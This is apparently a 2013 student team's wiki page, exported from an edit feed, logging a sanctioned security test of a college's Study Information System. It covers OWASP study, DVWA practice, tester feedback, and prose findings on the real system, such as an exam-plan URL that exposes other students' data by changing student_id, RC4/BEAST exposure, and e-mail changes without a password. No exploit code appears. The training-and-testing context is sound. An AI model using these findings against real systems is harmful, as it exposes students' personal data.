&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
* &#039;&#039;&#039;What I did like: &#039;&#039;&#039;&lt;br /&gt;
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.&lt;br /&gt;
** Multicultural groups, where all the participants are from different countries.&lt;br /&gt;
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like: &#039;&#039;&lt;br /&gt;
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)&lt;br /&gt;
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Everything was organized really well.&lt;br /&gt;
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.&lt;br /&gt;
** Everything was also free for us except the beer.&lt;br /&gt;
** I met many new interesting people and got to know about their cultures.&lt;br /&gt;
** I got new friends for life.&lt;br /&gt;
** Our project was interesting and i learned new skills.&lt;br /&gt;
** I also liked FREE water, Estonian girls and Americana pizza place.&lt;br /&gt;
** This IP was one of my best experiences ever.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Lack of free time&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Accommodation&lt;br /&gt;
** The equipment we used&lt;br /&gt;
** The capabilities and expertise of the professors&lt;br /&gt;
** The overall quality of teaching&lt;br /&gt;
** The expected learning outcomes&lt;br /&gt;
** The activities besides the general course&lt;br /&gt;
** Friendly environment&lt;br /&gt;
** Working in teams. Thanks guys!&lt;br /&gt;
** Free water&lt;br /&gt;
** Tasty food&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** To long working hours&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62416</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62416"/>
		<updated>2013-04-05T08:43:38Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Sten Aus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
